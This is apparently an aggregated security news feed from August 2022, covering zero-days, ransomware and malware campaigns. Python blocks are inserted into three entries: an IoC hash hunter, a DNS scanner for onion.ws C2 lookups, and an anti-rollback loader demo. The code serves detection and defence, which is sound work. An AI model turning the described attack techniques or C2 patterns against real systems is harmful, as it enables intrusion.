                exploits
                2022-08-18 https://www.malwarebytes.com/blog/news/2022/08/urgent-update-for-macos-and-ios-two-actively-exploited-zero-days-fixed

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: macOS

                Tags: iOS

                Tags: CVE-2022-32894

                Tags: CVE-2022-32893

                Tags: kernel privileges

                Tags: WebKit

                Tags: actively exploited

                Tags: watering hole

                Tags: exploit kit

                Apple has released emergency security updates to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs.

                (Read more...)

                The post Urgent update for macOS and iOS! Two actively exploited zero-days fixed appeared first on Malwarebytes Labs.

                "

                Autosummary: This code could be used to leverage CVE-2022-32894 to obtain kernel privileges. Mitigation: users are advised to implement the updates as soon as possible, by upgrading to iOS 15.6.1 and iPadOS 15.6. "


                TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats

                industry ciber
                2022-08-18 https://www.helpnetsecurity.com/2022/08/19/txone-networks-funding/

                TXOne Networks has entered into definitive agreements in connection with its Series B financing with total investment proceeds of $70 million. The latest capital injection will be used to expand TXOne Networks’ global presence and defend industry verticals worldwide against cybersecurity threats to industrial control systems (ICS). The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, … More

                The post TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats appeared first on Help Net Security.

                "

                Autosummary: The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, Ta Ya Venture Capital, Simplo Technology Group, CHT Security Corporation and Ash Tower Limited, as well as Steven Pan, Silks Hotel Group Chair, and Chun-I Wu, TAYIH Group Chair. "


                Safari 15.6.1 addresses a zero-day flaw actively exploited in the wild

                exploits
                2022-08-18 https://securityaffairs.co/wordpress/134553/security/safari-15-6-1-fixes-zero-day.html

                Apple released Safari 15.6.1 for macOS Big Sur and Catalina to address a zero-day vulnerability actively exploited in the wild. Safari 15.6.1 for macOS Big Sur and Catalina addressed an actively exploited zero-day vulnerability tracked as CVE-2022-32893. The flaw is an out-of-bounds write issue in WebKit and the IT giant fixed it with improved bounds […]

                The post Safari 15.6.1 addresses a zero-day flaw actively exploited in the wild appeared first on Security Affairs.

                "

                Autosummary: "


                LockBit claims ransomware attack on security giant Entrust, leaks data

                exploits ransomware
                2022-08-18 https://www.bleepingcomputer.com/news/security/lockbit-claims-ransomware-attack-on-security-giant-entrust-leaks-data/
                The LockBit ransomware gang has claimed responsibility for the June cyberattack on digital security giant Entrust. [...] "

                Autosummary: Update 8/21/22: LockBit leaks alleged Entrust data. LockBit began leaking Entrust's data Friday evening, first sharing screenshots of some of the allegedly stolen data, with the threat actors saying they would leak further data later that evening. "


                How attackers are exploiting corporate IoT

                exploits industry
                2022-08-17 https://www.helpnetsecurity.com/2022/08/17/how-attackers-are-exploiting-corporate-iot-video/

                In this Help Net Security video, Brian Contos, CSO at Phosphorus Cybersecurity, discusses how most companies consider IoT threats to be limited in scope. In actuality, a growing number of sophisticated adversaries are realizing the true value of IoT as an easy initial breach point to get access to the corporate network. These devices also enable them to achieve long-term persistence through network footholds that will avoid detection and survive remediation.

                The post How attackers are exploiting corporate IoT appeared first on Help Net Security.

                "

                Autosummary: "


                Response-based attacks make up 41% of all email-based scams

                financial
                2022-08-17 https://www.helpnetsecurity.com/2022/08/17/response-based-attacks-climbed/

                Response-based attacks targeting corporate inboxes have climbed to their highest volume since 2020, representing 41 percent of all email-based scams targeting employees, during Q2 of this year. This is according to the latest Quarterly Threat Trends & Intelligence Report from Agari and PhishLabs. From April through June, researchers analyzed hundreds of thousands of phishing and social media attacks targeting enterprises and their employees. The report uses the data from those attacks to present key trends … More

                The post Response-based attacks make up 41% of all email-based scams appeared first on Help Net Security.

                "

                Autosummary: A response-based threat is a social-engineering attack that relies on victims responding through a chosen channel of communication, and comprises methods such as phishing (targeting victims over email), vishing/smishing (over a voice call or an SMS text message) and advance-fee fraud where victims are tricked into sending an upfront-fee in exchange for a larger sum of money – also known as a 419 or Nigerian scam. "


                North Korea Hackers Spotted Targeting Job Seekers with macOS Malware

                exploits
                2022-08-17 https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html
                The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets. Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into



                North Korea-linked APT targets Job Seekers with macOS malware

                exploits
                2022-08-17 https://securityaffairs.co/wordpress/134491/malware/north-korea-mac-malware-m1.html

                The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware that runs on both Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active since at least June 2020. The campaign targets employees working in the aerospace and military sectors and leverages […]

                The post North Korea-linked APT targets Job Seekers with macOS malware appeared first on Security Affairs.

                "

                Autosummary: IoCs (SHA-256, from the ESET Research Twitter thread of August 16, 2022): FE336A032B564EEF07AFB2F8A478B0E0A37D9A1A6C4C1E7CD01E404CC5DD2853 (Extractor), 798020270861FDD6C293AE8BA13E86E100CE048830F86233910A2826FACD4272 (FinderFontsUpdater), 49046DFEAEFC59747E45E013F3AB5A2895B4245CFAA218DD2863D86451104506 (safarifontagent).
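A way to put the three digests above to use, as an added example that is not ESET's or Security Affairs' code: a small Python IoC hunt that streams every regular file under the given directories through SHA-256 and reports any file whose digest matches one of the listed samples. The default search roots, the command-line usage and the output format are assumptions; only the three hashes come from the entry.

```python
#!/usr/bin/env python3
"""Hunt a filesystem for the Lazarus macOS samples listed in the IoCs above.

Added example; the only data taken from the article is the three SHA-256 digests.
"""
import hashlib
import os
import sys
from pathlib import Path

# SHA-256 IoCs quoted above (ESET Research thread, 16 August 2022), lowercased
# once here so that lookups are case-insensitive.
LAZARUS_MACOS_IOCS = {
    "fe336a032b564eef07afb2f8a478b0e0a37d9a1a6c4c1e7cd01e404cc5dd2853": "Extractor",
    "798020270861fdd6c293ae8ba13e86e100ce048830f86233910a2826facd4272": "FinderFontsUpdater",
    "49046dfeaefc59747e45e013f3ab5a2895b4245cfaa218dd2863d86451104506": "safarifontagent",
}

# Default search roots are an assumption: user-writable places where a dropped
# bundle would plausibly land on macOS, not paths named in the article.
DEFAULT_ROOTS = [os.path.expanduser("~/Downloads"), os.path.expanduser("~/Library"), "/tmp"]


def sha256_bytes(data: bytes) -> str:
    """SHA-256 hex digest of an in-memory buffer."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large binaries are never read whole into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def match_hash(digest: str, iocs=LAZARUS_MACOS_IOCS):
    """Return the IoC label for a digest given in any case, or None if it is unknown."""
    return iocs.get(digest.strip().lower())


def hunt(roots, iocs=LAZARUS_MACOS_IOCS):
    """Walk each root, hash every regular file, and return [(path, label), ...] for hits.

    Symlinks are skipped (a link to a known-bad file is not itself the sample, and
    following links can loop); unreadable files are skipped rather than aborting
    the whole sweep. A root that does not exist simply yields nothing.
    """
    hits = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
            for name in filenames:
                p = Path(dirpath) / name
                if p.is_symlink() or not p.is_file():
                    continue
                try:
                    label = match_hash(sha256_file(p), iocs)
                except OSError:
                    continue
                if label is not None:
                    hits.append((str(p), label))
    return hits


if __name__ == "__main__":
    roots = sys.argv[1:] or DEFAULT_ROOTS
    found = hunt(roots)
    for path, label in found:
        print(f"MATCH {label}: {path}")
    print(f"{len(found)} hit(s) across {len(roots)} root(s)")
```

A hit is a strong signal, but no hit proves little: a recompiled or re-signed build changes the digest, so pair a hash sweep with a hunt for the three file names and the decoy PDF rather than relying on the hashes alone.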


                Google fixes fifth Chrome zero-day bug exploited this year

                exploits
                2022-08-17 https://www.bleepingcomputer.com/news/security/google-fixes-fifth-chrome-zero-day-bug-exploited-this-year/
                Google has released a security update for Chrome browser that addresses close to a dozen vulnerabilities, including a zero-day flaw that is being exploited in the wild. [...]



                New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild

                exploits
                2022-08-17 https://thehackernews.com/2022/08/new-google-chrome-zero-day.html
                Google on Tuesday rolled out patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild. Tracked as CVE-2022-2856, the issue has been described as a case of insufficient validation of untrusted input in Intents. Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on



                North Korean hackers use signed macOS malware to target IT job seekers

                exploits
                2022-08-17 https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/
                North Korean hackers from the Lazarus group have been using a signed malicious executable for macOS to impersonate Coinbase and lure in employees in the financial technology sector. [...]

                Autosummary: In a thread on Twitter, the researchers note that the malware drops three files: the bundle FinderFontsUpdater.app, the downloader safarifontagent, and a decoy PDF called “Coinbase_online_careers_2022_07” (the same decoy as the Windows malware). A similar campaign targeting macOS users and attributed to Lazarus was identified last year.


                Malware devs already bypassed Android 13's new security feature

                exploits
                2022-08-17 https://www.bleepingcomputer.com/news/security/malware-devs-already-bypassed-android-13s-new-security-feature/
                Android malware developers are already adjusting their tactics to bypass a new "Restricted settings" security feature introduced by Google in the newly released Android 13. [...]

                Autosummary: In a new report released today, ThreatFabric has discovered a new Android malware dropper that is already adding features to bypass the new Restricted settings security feature.


                Cybercriminals Developing BugDrop Malware to Bypass Android Security Features

                exploits ciber
                2022-08-17 https://thehackernews.com/2022/08/cybercriminals-developing-bugdrop.html
                In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a previously undocumented Android dropper trojan that's currently in development. "This new malware tries to abuse devices using a novel technique, not seen before in Android malware, to spread the extremely dangerous Xenomorph banking trojan, allowing criminals



                APT Lazarus Targets Engineers with macOS Malware

                exploits
                2022-08-17 https://threatpost.com/apt-lazarus-macos-malware/180426/
                The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple silicon and Intel-based Macs.

                Autosummary: The malware is similar to a sample discovered by ESET in May, which also included a signed executable disguised as a job description, was compiled for both Apple silicon and Intel, and dropped a PDF decoy, researchers said.


                Bugdrop dropper includes features to circumvent Google’s security Controls

                exploits
                2022-08-17 https://securityaffairs.co/wordpress/134508/malware/bugdrop-android-malware.html

                Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that’s still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be implemented in the next release of the Google OS. The experts noticed something unusual in the […]

                The post Bugdrop dropper includes features to circumvent Google’s security Controls appeared first on Security Affairs.

                "

                Autosummary: “Once granted, while showing a loading screen, the dropper initiates a connection with its onion.ws C2, which relies on the TOR protocol, obtaining back its configuration and the URL of the payload to download and install,” reads the analysis of the experts.
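The C2 detail in the quote above (a Tor2Web-style gateway under onion.ws, contacted by a freshly installed app) is something a network defender can hunt for in DNS logs. What follows is an added example, not ThreatFabric's or Security Affairs' code: it scans a constructed DNS query log for names under onion.ws, pulls out the hidden-service label, and groups the hits per client. The log line format and the sample lines are constructed for the demonstration; only the onion.ws gateway domain comes from the article.

```python
#!/usr/bin/env python3
"""Flag DNS lookups of Tor2Web-style gateway names such as <service>.onion.ws.

Added example. The gateway domain comes from the BugDrop analysis quoted above;
the log line format and the sample lines are constructed for the demonstration.
"""
import re
from collections import defaultdict

# Gateway suffixes to watch. Only onion.ws is named in the article; any further
# Tor2Web gateways added here come from your own threat intel (assumption).
TOR2WEB_SUFFIXES = ("onion.ws",)

# Constructed log format: "<timestamp> <client-ip> <qtype> <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)\s*$")

# Constructed sample log. Lines 2 and 5 are true hits; lines 4 and 6 are deliberate
# look-alikes that a naive substring check would flag; the last line is garbage.
SAMPLE_LOG = """\
2022-08-17T09:58:01Z 10.0.0.12 A www.example.com
2022-08-17T09:58:07Z 10.0.0.12 A abcdefghijklmnop.onion.ws
2022-08-17T09:58:09Z 10.0.0.31 AAAA cdn.example.net
2022-08-17T09:58:15Z 10.0.0.31 A onion.ws.example.org
2022-08-17T09:59:02Z 10.0.0.12 A zyxwvutsrqponmlk.onion.ws.
2022-08-17T09:59:40Z 10.0.0.57 A notonion.ws
malformed line that the parser must ignore
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # DNS names are case-insensitive and may carry a trailing root dot.
    rec["qname"] = rec["qname"].rstrip(".").lower()
    return rec


def is_tor2web(qname, suffixes=TOR2WEB_SUFFIXES):
    """True only for the gateway itself or a name under it, never for look-alikes.

    'notonion.ws' and 'onion.ws.example.org' must not match, so the comparison is
    made on label boundaries rather than with a substring search.
    """
    return any(qname == s or qname.endswith("." + s) for s in suffixes)


def onion_label(qname, suffixes=TOR2WEB_SUFFIXES):
    """Return the label directly under the gateway suffix (the hidden-service address)."""
    for s in suffixes:
        if qname.endswith("." + s):
            return qname[: -len(s) - 1].split(".")[-1]
    return None


def hunt(lines):
    """Return {client: [(timestamp, qname, onion_label), ...]} for every gateway lookup."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_tor2web(rec["qname"]):
            continue
        hits[rec["client"]].append((rec["ts"], rec["qname"], onion_label(rec["qname"])))
    return dict(hits)


if __name__ == "__main__":
    for client, events in sorted(hunt(SAMPLE_LOG.splitlines()).items()):
        for ts, qname, label in events:
            print(f"{ts} {client} -> {qname} (hidden service {label})")
```

A match is a hunt lead rather than proof of compromise, but on a managed fleet a lookup of a gateway like this from a device that just installed an app is worth pulling the install history for.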


                Google fixed a new Chrome Zero-Day actively exploited in the wild

                exploits
                2022-08-17 https://securityaffairs.co/wordpress/134501/security/google-fifth-chrome-zero-day-exploited.html

                Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year. Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops including an actively exploited high-severity zero-day flaw in the wild. The actively exploited flaw, tracked as CVE-2022-2856, is an Insufficient validation […]

                The post Google fixed a new Chrome Zero-Day actively exploited in the wild appeared first on Security Affairs.

                "

                Autosummary: Earlier Chrome zero-days exploited this year: a heap buffer overflow in the Web Real-Time Communications (WebRTC) component; CVE-2022-1364 (April 14), a type confusion issue in the V8 JavaScript engine; CVE-2022-1096 (March 25), a type confusion in the V8 JavaScript engine; and CVE-2022-0609 (February 14), a use-after-free issue in the Animation component.


                BlackByte ransomware gang is back with new extortion tactics

                exploits ransomware industry
                2022-08-17 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-gang-is-back-with-new-extortion-tactics/
                The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. [...]



                Malicious PyPi packages turn Discord into password-stealing malware

                exploits
                2022-08-17 https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-turn-discord-into-password-stealing-malware/
                A dozen malicious PyPI packages have been discovered installing malware that modifies the Discord client to become an information-stealing backdoor and steals data from web browsers and Roblox. [...]

                Autosummary: The first binary, ZYXMN.exe, is used to steal information from Google Chrome, Chromium, Microsoft Edge, Firefox, and Opera, including stored passwords, browser history, cookies, and search history.


                Apple security updates fix 2 zero-days used to hack iPhones, Macs

                exploits
                2022-08-17 https://www.bleepingcomputer.com/news/security/apple-security-updates-fix-2-zero-days-used-to-hack-iphones-macs/
                Apple has released emergency security updates today to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs. [...]

                Autosummary: Seven zero-days have been patched by Apple this year. In March, Apple patched two more zero-day bugs, in the Intel Graphics Driver (CVE-2022-22674) and AppleAVD (CVE-2022-22675), that could also be used to execute code with kernel privileges.


                Nearly 2,000 Signal users affected by Twilio phishing attack

                financial
                2022-08-17 https://www.malwarebytes.com/blog/news/2022/08/nearly-2000-signal-users-compromised-after-twilio-phishing-attack

                Categories: News, Social engineering

                Not all phishing campaigns are after your bank details. In the case of the Twilio breach, attackers were after three particular Signal accounts.


                The post Nearly 2,000 Signal users affected by Twilio phishing attack appeared first on Malwarebytes Labs.

                "

                Autosummary: However, Signal reassured users that the attacker could not gain access to "message history, contact lists, profile information, whom they'd blocked, and other personal data" associated with the account.


                Update Chrome now! Google issues patch for zero day spotted in the wild

                exploits
                2022-08-17 https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild

                Categories: Exploits and vulnerabilities, News

                Tags: 104.0.5112.101, Google, Chrome, CVE-2022-2852, CVE-2022-2856, CVE-2022-2854, CVE-2022-2853, UAF, heap buffer overflow

                Google issued an update that includes 11 security fixes. One of the vulnerabilities is rated “Critical,” and one of those rated “High” is being exploited in the wild.


                The post Update Chrome now! Google issues patch for zero day spotted in the wild appeared first on Malwarebytes Labs.

                "

                Autosummary: The easiest way to update Chrome is to allow it to update automatically, which uses the same method as a manual update but does not require your attention. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database.


                Airiam acquires Vantage Point Solutions to assist SMEs with cybersecurity and MSP support

                ciber
                2022-08-17 https://www.helpnetsecurity.com/2022/08/18/airiam-vantage-point-solutions-group/

                Airiam has acquired Vantage Point Solutions Group. The addition of Vantage Point Solutions Group extends Airiam’s reach as a national cybersecurity provider to small to medium-sized enterprises (SMEs). “Airiam is thrilled to support Vantage Point Solutions Group’s customers with our world-class line of AirProducts and welcome their talented employees into the Airiam family,” said Ohad Jehassi, Airiam’s CEO. “In addition to enhancing the MSP services they already receive, customers will now have a wider selection … More

                The post Airiam acquires Vantage Point Solutions to assist SMEs with cybersecurity and MSP support appeared first on Help Net Security.

                "

                Autosummary: “In addition to enhancing the MSP services they already receive, customers will now have a wider selection of services, including a managed security service provider (MSSP), managed detection and response (MDR), recovery, compliance services, digital transformation, and consulting,” Jehassi continued.


                Veracode launches Velocity Partner Program to help customers with security and development challenges

                government
                2022-08-17 https://www.helpnetsecurity.com/2022/08/18/veracode-velocity-partner-program/

                Veracode has launched the Veracode Velocity Partner Program. The objective of the program is to enable partners to grow their security practice around Veracode’s cloud-native Continuous Software Security Platform, offering opportunities to accelerate deal closure, expand market share, and grow revenue. The program’s integrated features include demand-generation campaigns aligned to key security initiatives, on-demand sales and technical enablement tools, and a role-based partner training and certification program. Partners that play a critical role in helping … More

                The post Veracode launches Velocity Partner Program to help customers with security and development challenges appeared first on Help Net Security.

                "

                Autosummary: Level 1, Sprint Partners: All Veracode partners begin at this level and have access to tools, including marketing campaigns and on-demand programs, training and certifications, automatic subscriptions to all partner communications, and online resources via the Partner Community. “Utilizing Veracode’s integrated features, such as training and certification, new demand-generation offerings, and tools and products via the broader marketplace helps us deliver better results for our clients,” Dubik continued.


                Argentina"s Judiciary of Córdoba hit by PLAY ransomware attack

                exploits latam ransomware
                2022-08-16 https://www.bleepingcomputer.com/news/security/argentinas-judiciary-of-c-rdoba-hit-by-play-ransomware-attack/
                Argentina"s Judiciary of Córdoba has shut down its IT systems after suffering a ransomware attack, reportedly at the hands of the new "Play" ransomware operation. [...] "

                Autosummary: " Justicia Córdoba"s website is suffering an outage Source: BleepingComputer Attack linked to Play ransomware While the Judiciary has not disclosed details of the attack, journalist Luis Ernest Zegarra tweeted that they were hit by ransomware that appends the ".Play" extension to encrypted files. "


                Russian State Hackers Continue to Attack Ukrainian Entities with Infostealer Malware

                exploits government ransomware
                2022-08-16 https://thehackernews.com/2022/08/russian-state-hackers-continue-to.html
                Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what's suspected to be an espionage operation. Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked as Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa. The findings have been corroborated



                Russia-linked Gamaredon APT continues to target Ukraine

                ransomware
                2022-08-16 https://securityaffairs.co/wordpress/134438/apt/gamaredon-continues-target-ukraine.html

                Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon […]

                The post Russia-linked Gamaredon APT continues to target Ukraine appeared first on Security Affairs.

                "



                New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks

                industry
                2022-08-16 https://thehackernews.com/2022/08/new-evil-plc-attack-weaponizes-plcs-to.html
                Cybersecurity researchers have detailed a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently move into the operational technology (OT) networks. Dubbed the "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider

                Autosummary: Dubbed the "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson.


                Unified Threat Management: The All-in-One Cybersecurity Solution

                ciber
                2022-08-16 https://thehackernews.com/2022/08/unified-threat-management-all-in-one.html
                UTM (Unified threat management) is thought to be an all-in-one solution for cybersecurity. In general, it is a versatile software or hardware firewall solution integrated with IPS (Intrusion Prevention System) and other security services. A universal gateway allows the user to manage network security with one comprehensive solution, which makes the task much easier. In addition, compared to a

                Autosummary: SafeUTM has flexible integration scenarios: it supports VMware, Microsoft Hyper-V, VirtualBox, KVM and Citrix XenServer hypervisors, and monitoring systems such as Zabbix agent, SNMP, DLP (via ICAP), and Microsoft Active Directory. It prevents intrusion, filters content, controls apps, has anti-virus traffic inspection, secure VPN, reporting and more.


                Microsoft Warns About Phishing Attacks by Russia-linked Hackers

                financial
                2022-08-16 https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html
                Microsoft on Monday revealed it took steps to disrupt phishing operations undertaken by a "highly persistent threat actor" whose objectives align closely with Russian state interests. The company is tracking the espionage-oriented activity cluster under its chemical element-themed moniker SEABORGIUM, which it said overlaps with a hacking group also known as Callisto, COLDRIVER, and TA446.

                Autosummary: " Primary targets include defense and intelligence consulting companies, non-governmental organizations (NGOs) and intergovernmental organizations (IGOs), think tanks, and higher education entities located in the U.S. and the U.K., and to a lesser extent in the Baltics, the Nordics, and the Eastern Europe. "


                Xiaomi Phone Bug Allowed Payment Forgery

                exploits
                2022-08-16 https://threatpost.com/xiaomi-phones-found-vulnerable-to-payment-forgery/180416/
                Mobile transactions could’ve been disabled, created and signed by attackers.

                Autosummary: Using a regular, unprivileged Android application, the researchers were able to communicate with the trusted soter app via “SoterService,” an API for managing soter keys. By performing a classic heap overflow attack, they were able to “completely compromise the Tencent soter platform,” allowing much greater power to, for example, sign fake payment packages. Within Xiaomi's own trusted-app format was a further flaw: an absence of version control, without which “an attacker can transfer an old version of a trusted app to the device and use it to overwrite the new app file.”
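The version-control gap described above (an old, still validly signed trusted app overwriting the patched one) is a rollback attack, and the fix is a monotonic minimum-version record that the loader consults alongside the signature. The following is an added example, not the researchers', Xiaomi's or Tencent's code: a Python sketch of a signature-only loader beside one that also enforces anti-rollback, with the downgrade replayed against both. The package format, the HMAC signature and the in-memory minimum-version table are constructed stand-ins and are assumptions; on a device the signature would be the vendor's asymmetric scheme and the counter would live in replay-protected storage that the normal world cannot rewind.

```python
#!/usr/bin/env python3
"""Signature-only trusted-app loading versus loading with anti-rollback.

Added example. The package format, the HMAC-based signature and the in-memory
minimum-version table are constructed stand-ins; on a real device the signature
would be the vendor's asymmetric scheme and the counter would live in
replay-protected storage (RPMB, eFuses) that the normal world cannot rewind.
"""
import hashlib
import hmac
import json

SIGNING_KEY = b"constructed-demo-key"  # stand-in for the vendor's private key


def sign_package(name: str, version: int, payload: bytes, key: bytes = SIGNING_KEY) -> dict:
    """Build a signed trusted-app package: canonical JSON body plus HMAC-SHA256 tag."""
    body = json.dumps(
        {"name": name, "version": version, "payload": payload.hex()}, sort_keys=True
    ).encode()
    return {"body": body, "sig": hmac.new(key, body, hashlib.sha256).hexdigest()}


def verify_signature(pkg: dict, key: bytes = SIGNING_KEY) -> bool:
    """Constant-time check that the body was signed with the vendor key."""
    expected = hmac.new(key, pkg["body"], hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, pkg["sig"])


def package_meta(pkg: dict) -> dict:
    return json.loads(pkg["body"])


class SignatureOnlyLoader:
    """The flawed design: authenticity is checked, freshness is not.

    Every version the vendor ever signed stays installable forever, so an attacker
    who kept a copy of an old, vulnerable trusted app can reinstall it over a
    patched one without breaking any signature check.
    """

    def __init__(self):
        self.installed = {}  # app name -> installed version

    def install(self, pkg: dict) -> bool:
        if not verify_signature(pkg):
            return False
        meta = package_meta(pkg)
        self.installed[meta["name"]] = meta["version"]
        return True


class AntiRollbackLoader:
    """Same signature check, plus a monotonic per-app minimum version.

    The minimum only ever increases, so once version N has been installed no
    package with version < N is accepted again, even though its signature is valid.
    Reinstalling the current version is still allowed.
    """

    def __init__(self):
        self.installed = {}
        self.min_version = {}  # would be a hardware-backed counter on a device

    def install(self, pkg: dict) -> bool:
        if not verify_signature(pkg):
            return False
        meta = package_meta(pkg)
        name, version = meta["name"], meta["version"]
        if version < self.min_version.get(name, 0):
            return False  # rollback attempt: refuse and keep the current app
        self.installed[name] = version
        self.min_version[name] = max(self.min_version.get(name, 0), version)
        return True


def demo():
    """Replay the downgrade against both loaders; returns (flawed_result, fixed_result)."""
    old = sign_package("soter", 1, b"old build with the heap bug")
    new = sign_package("soter", 2, b"patched build")
    flawed, fixed = SignatureOnlyLoader(), AntiRollbackLoader()
    for loader in (flawed, fixed):
        loader.install(new)   # patched version goes on first
        loader.install(old)   # attacker replays the old, validly signed package
    return flawed.installed["soter"], fixed.installed["soter"]


if __name__ == "__main__":
    print("installed after replay (signature-only, anti-rollback):", demo())
```

The point the replay makes is that a signature answers "did the vendor produce this?" and nothing else; "is this at least as new as what is already installed?" needs separate state, and that state is only worth anything if the attacker cannot reset it.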


                AA22-228A: Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite

                exploits
                2022-08-16 https://us-cert.cisa.gov/ncas/alerts/aa22-228a
                Original release date: August 16, 2022

                Summary

                Actions for ZCS administrators to take today to mitigate malicious cyber activity:
                • Patch all systems and prioritize patching known exploited vulnerabilities.
                • Deploy detection signatures and hunt for indicators of compromise (IOCs).
                • If ZCS was compromised, remediate malicious activity.

                The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. CVEs currently being exploited against ZCS include: 

                • CVE-2022-24682 
                • CVE-2022-27924 
                • CVE-2022-27925 chained with CVE-2022-37042 
                • CVE-2022-30333

                Cyber threat actors may be targeting unpatched ZCS instances in both government and private sector networks. CISA and the MS-ISAC strongly urge users and administrators to apply the guidance in the Recommendations section of this CSA to help secure their organization’s systems against malicious cyber activity. CISA and the MS-ISAC encourage organizations who did not immediately update their ZCS instances upon patch release, or whose ZCS instances were exposed to the internet, to assume compromise and hunt for malicious activity using the third-party detection signatures in the Detection Methods section of this CSA. Organizations that detect potential compromise should apply the steps in the Incident Response section of this CSA.


                Autosummary: A Metasploit module is also available that creates a RAR file that can be emailed to a ZCS server to exploit CVE-2022-30333.[10] CVE-2022-24682 is a medium-severity vulnerability that impacts ZCS webmail clients running releases before 8.8.15 patch 30 (update 1), which contain a cross-site scripting (XSS) vulnerability allowing malicious actors to steal session cookie files.


                U.K. Water Supplier Hit with Clop Ransomware Attack

                exploits ransomware
                2022-08-16 https://threatpost.com/water-supplier-hit-clop-ransomware/180422/
                The incident disrupted corporate IT systems at one company while attackers misidentified the victim in a post on its website that leaked stolen data.

                Autosummary: The breached data, published online after ransom negotiations between Clop and its victim broke down, also includes passports, screenshots from water-treatment SCADA systems, driver’s licenses and more, the report said.


                Exploit out for critical Realtek flaw affecting many networking devices

                exploits
                2022-08-16 https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/
                Exploit code has been released for a critical vulnerability affecting networking devices with Realtek's RTL819x system on a chip (SoC), which are estimated to be in the millions. [...]

                Autosummary: Johannes Ullrich, Dean of Research at SANS, says that a remote attacker could exploit the vulnerability to crash the device, execute arbitrary code, establish backdoors for persistence, reroute network traffic, or intercept network traffic. Ullrich warns that if an exploit for CVE-2022-27255 turns into a worm, it could spread over the internet in minutes.


                CISA and FBI issue alert about Zeppelin ransomware

                exploits ransomware
                2022-08-16 https://www.malwarebytes.com/blog/news/2022/08/cisa-and-fbi-issue-alert-about-zeppelin-ransomware

                Categories: News, Ransomware

                Tags: Zeppelin, ransomware, RDP, Sonicwall, phishing, malvertising, backups, authentication, mfa, patching, EDR

                The FBI and CISA have issued a joint Cybersecurity Advisory (CSA) to raise awareness about Zeppelin ransomware


                The post CISA and FBI issue alert about Zeppelin ransomware appeared first on Malwarebytes Labs.

                "

